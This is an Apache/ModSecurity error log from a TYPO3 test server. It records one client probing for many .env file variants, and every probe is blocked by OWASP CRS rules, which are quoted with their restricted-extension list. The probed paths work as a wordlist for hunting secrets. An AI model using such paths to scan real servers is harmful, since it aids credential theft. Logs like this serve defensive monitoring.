[Sun Aug 10 18:02:06.230806 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.project"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.project"] [unique_id "aJjCfiTM1z0kwYTEsGjdVAAAAAI"]
[Sun Aug 10 18:02:06.231140 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.project"] [unique_id "aJjCfiTM1z0kwYTEsGjdVAAAAAI"]
[Sun Aug 10 18:02:06.231386 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.project"] [unique_id "aJjCfiTM1z0kwYTEsGjdVAAAAAI"]
[Sun Aug 10 18:02:06.252035 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdVQAAAAI"]
[Sun Aug 10 18:02:06.252409 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdVQAAAAI"]
[Sun Aug 10 18:02:06.252674 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aJjCfiTM1z0kwYTEsGjdVQAAAAI"]
[Sun Aug 10 18:02:06.272939 2025] [authz_core:error] [pid 1839636] [client 185.177.72.56:4414] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Sun Aug 10 18:02:06.294600 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.config"] [unique_id "aJjCfiTM1z0kwYTEsGjdVwAAAAI"]
[Sun Aug 10 18:02:06.294775 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.config"] [unique_id "aJjCfiTM1z0kwYTEsGjdVwAAAAI"]
[Sun Aug 10 18:02:06.295035 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.config"] [unique_id "aJjCfiTM1z0kwYTEsGjdVwAAAAI"]
[Sun Aug 10 18:02:06.295277 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.config"] [unique_id "aJjCfiTM1z0kwYTEsGjdVwAAAAI"]
[Sun Aug 10 18:02:06.316040 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env-example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env-example"] [unique_id "aJjCfiTM1z0kwYTEsGjdWAAAAAI"]
[Sun Aug 10 18:02:06.316299 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env-example"] [unique_id "aJjCfiTM1z0kwYTEsGjdWAAAAAI"]
[Sun Aug 10 18:02:06.316514 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env-example"] [unique_id "aJjCfiTM1z0kwYTEsGjdWAAAAAI"]
[Sun Aug 10 18:02:06.337070 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env-sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env-sample"] [unique_id "aJjCfiTM1z0kwYTEsGjdWQAAAAI"]
[Sun Aug 10 18:02:06.337339 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env-sample"] [unique_id "aJjCfiTM1z0kwYTEsGjdWQAAAAI"]
[Sun Aug 10 18:02:06.337535 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env-sample"] [unique_id "aJjCfiTM1z0kwYTEsGjdWQAAAAI"]
[Sun Aug 10 18:02:06.357928 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aJjCfiTM1z0kwYTEsGjdWgAAAAI"]
[Sun Aug 10 18:02:06.358114 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aJjCfiTM1z0kwYTEsGjdWgAAAAI"]
[Sun Aug 10 18:02:06.358417 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aJjCfiTM1z0kwYTEsGjdWgAAAAI"]
[Sun Aug 10 18:02:06.358640 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aJjCfiTM1z0kwYTEsGjdWgAAAAI"]
[Sun Aug 10 18:02:06.379679 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aJjCfiTM1z0kwYTEsGjdWwAAAAI"]
[Sun Aug 10 18:02:06.380020 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aJjCfiTM1z0kwYTEsGjdWwAAAAI"]
[Sun Aug 10 18:02:06.380274 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aJjCfiTM1z0kwYTEsGjdWwAAAAI"]
[Sun Aug 10 18:02:06.400746 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aJjCfiTM1z0kwYTEsGjdXAAAAAI"]
[Sun Aug 10 18:02:06.401004 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aJjCfiTM1z0kwYTEsGjdXAAAAAI"]
[Sun Aug 10 18:02:06.401198 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aJjCfiTM1z0kwYTEsGjdXAAAAAI"]
[Sun Aug 10 18:02:06.421748 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aJjCfiTM1z0kwYTEsGjdXQAAAAI"]
[Sun Aug 10 18:02:06.422009 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aJjCfiTM1z0kwYTEsGjdXQAAAAI"]
[Sun Aug 10 18:02:06.422205 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aJjCfiTM1z0kwYTEsGjdXQAAAAI"]
[Sun Aug 10 18:02:06.442708 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.sample"] [unique_id "aJjCfiTM1z0kwYTEsGjdXgAAAAI"]
[Sun Aug 10 18:02:06.442959 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.sample"] [unique_id "aJjCfiTM1z0kwYTEsGjdXgAAAAI"]
[Sun Aug 10 18:02:06.443145 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development.sample"] [unique_id "aJjCfiTM1z0kwYTEsGjdXgAAAAI"]
[Sun Aug 10 18:02:06.463187 2025] [authz_core:error] [pid 1839636] [client 185.177.72.56:4414] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.dist
[Sun Aug 10 18:02:06.484020 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "aJjCfiTM1z0kwYTEsGjdYAAAAAI"]
[Sun Aug 10 18:02:06.484266 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "aJjCfiTM1z0kwYTEsGjdYAAAAAI"]
[Sun Aug 10 18:02:06.484459 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "aJjCfiTM1z0kwYTEsGjdYAAAAAI"]
[Sun Aug 10 18:02:06.504895 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.docker.dev"] [unique_id "aJjCfiTM1z0kwYTEsGjdYQAAAAI"]
[Sun Aug 10 18:02:06.505152 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.docker.dev"] [unique_id "aJjCfiTM1z0kwYTEsGjdYQAAAAI"]
[Sun Aug 10 18:02:06.505359 2025] [:error] [pid 1839636] [client 185.177.72.56:4414] [client 185.177.72.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.docker.dev"] [unique_id "aJjCfiTM1z0kwYTEsGjdYQAAAAI"]
